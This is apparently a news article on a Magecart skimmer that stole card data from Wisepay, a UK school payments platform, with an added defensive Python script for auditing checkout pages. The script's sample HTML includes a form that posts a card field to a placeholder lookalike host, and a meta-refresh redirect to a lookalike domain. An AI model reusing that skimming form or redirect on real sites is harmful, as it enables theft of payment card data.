Magecart strikes website of school payments service Wisepay

Magecart credit card skimmer harvested financial data of users of Wisepay’s platform over a two-day period

Wisepay, a supplier of financial services for schools that enables parents to pay for school meals, clubs and trips, among other things, has recovered its service after discovering a Magecart skimmer on its website was leaching credit card numbers earlier in October.

The firm said that data on an undisclosed number of transactions to approximately 300 schools may have been stolen when users who thought they were making legitimate payments were redirected, without their knowledge, to a malicious external page masquerading as Wisepay’s website.

The firm’s managing director Richard Grazier told the BBC the website was compromised via a “backdoor” in its database, and that only a small subset of the platform’s users would have noticed. This may be in part because the initial compromise occurred late on Friday 2 October and was discovered the following Monday, and far fewer payments would have been processed over the weekend.

Wisepay has notified both the Information Commissioner’s Office (ICO) and the police about the incident, which it said had not compromised any of the data it holds on its systems, and warned parents that any who think they may have been affected should immediately contact their banks or credit card providers, and change their online banking credentials.

Magecart works by injecting malicious JavaScript code into websites and third-party payment systems to steal credit card information while people enter it at the checkout, thinking they are making a legitimate payment. Recent high-profile victims include accessories store Claire’s.

It is a relatively simple form of cyber attack, with high reward potential for malicious actors, and as a result the technique is widely used by a variety of threat actors, including the infamous Lazarus group, which is linked to the North Korean government. The prevalence of such attacks has spiked since March 2020, given that far more people are shopping online during the Covid-19 pandemic.

Often, Magecart attacks begin in a targeted spearphishing attack on a member of staff at the victim organisation, but cyber criminals have also been known to exploit unsecured Amazon Web Services (AWS) S3 buckets and unpatched versions of Adobe’s Magento software, which is about to enter end-of-life.
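For site operators, one way to catch the kind of injection and silent redirection described above is to audit the payment page for scripts, forms, frames and meta refreshes that point at hosts outside an allowlist. The following is an added example, not code from Wisepay or from this article; the hostnames, the allowlist and the sample page are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample page; every hostname is a placeholder on a reserved TLD.
PAGE_URL = "https://pay.example.test/checkout"
ALLOWED_HOSTS = {"pay.example.test", "cdn.example.test"}
SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.test/lib.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://stats.unknown.invalid/a.js"></script>
<meta http-equiv="refresh" content="0; url=https://pay-example.invalid/checkout">
</head><body>
<form action="https://pay-example.invalid/collect" method="post"><input name="card"></form>
</body></html>
"""

class PaymentPageAudit(HTMLParser):
    """Flag code loaded from, or data sent to, hosts not on the allowlist."""
    URL_ATTRS = {"script": "src", "iframe": "src", "form": "action"}

    def __init__(self, page_url, allowed_hosts):
        super().__init__()
        self.page_url, self.allowed = page_url, allowed_hosts
        self.page_host = urlparse(page_url).hostname
        self.findings = []

    def _check(self, kind, raw_url, has_integrity=True):
        # Resolve relative URLs against the page before comparing hosts.
        host = urlparse(urljoin(self.page_url, raw_url)).hostname
        if host not in self.allowed:
            self.findings.append((kind, host, "host not on allowlist"))
        elif host != self.page_host and not has_integrity:
            self.findings.append((kind, host, "third-party script without integrity"))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        attr = self.URL_ATTRS.get(tag)
        if attr and a.get(attr):
            self._check(tag, a[attr], tag != "script" or bool(a.get("integrity")))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            # content has the form "0; url=https://host/path"
            target = (a.get("content") or "").partition("=")[2].strip(" '\"")
            if target:
                self._check("meta-refresh", target)

def audit(html, page_url=PAGE_URL, allowed_hosts=ALLOWED_HOSTS):
    parser = PaymentPageAudit(page_url, allowed_hosts)
    parser.feed(html)
    return parser.findings
```

Calling `audit(SAMPLE_HTML)` returns one finding per off-allowlist reference. A static check like this only sees markup as served, so it complements rather than replaces a Content-Security-Policy and monitoring of scripts added at runtime.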

ProPrivacy’s Attila Tomaschek said: “The Wisepay cyber attack highlights very clearly the dangers of online card skimming attacks. Wisepay would be an attractive target for cyber criminals looking to launch such an attack due to the large number of UK schools served by the online payment portal.

“The main problem, however, is that these types of attacks can be incredibly difficult to detect and, therefore, avoid. Those entering their credit card information into a compromised payment page would really have no idea that they were handing their card details over to cyber criminals because these malicious payment pages are designed to appear perfectly legitimate.

“While the responsibility to maintain secure payment pages obviously resides with the merchant, consumers can protect themselves by keeping a close, continuous eye on their credit reports and bank account statements and refraining from clicking on dodgy links or entering sensitive information onto any online form that seems off or compromised in any way,” said Tomaschek.

“Educational institutions need to keep their eyes on the networks for signs of intruders or user accounts escalating privileges, as well as making sure the fundamentals are still happening despite all the distractions of the start of term, like making sure old and unused user profiles are shut down and can’t be used by attackers,” added Jérôme Robert, director at active directory specialist Alsid.

“Given the turmoil in the education sector right now thanks to Covid, this is yet another headache for schools. There has been a spate of highly publicised ransomware attacks against universities recently, likely timed to coincide with the start of term – which attackers hope will increase their chances of success,” he said.
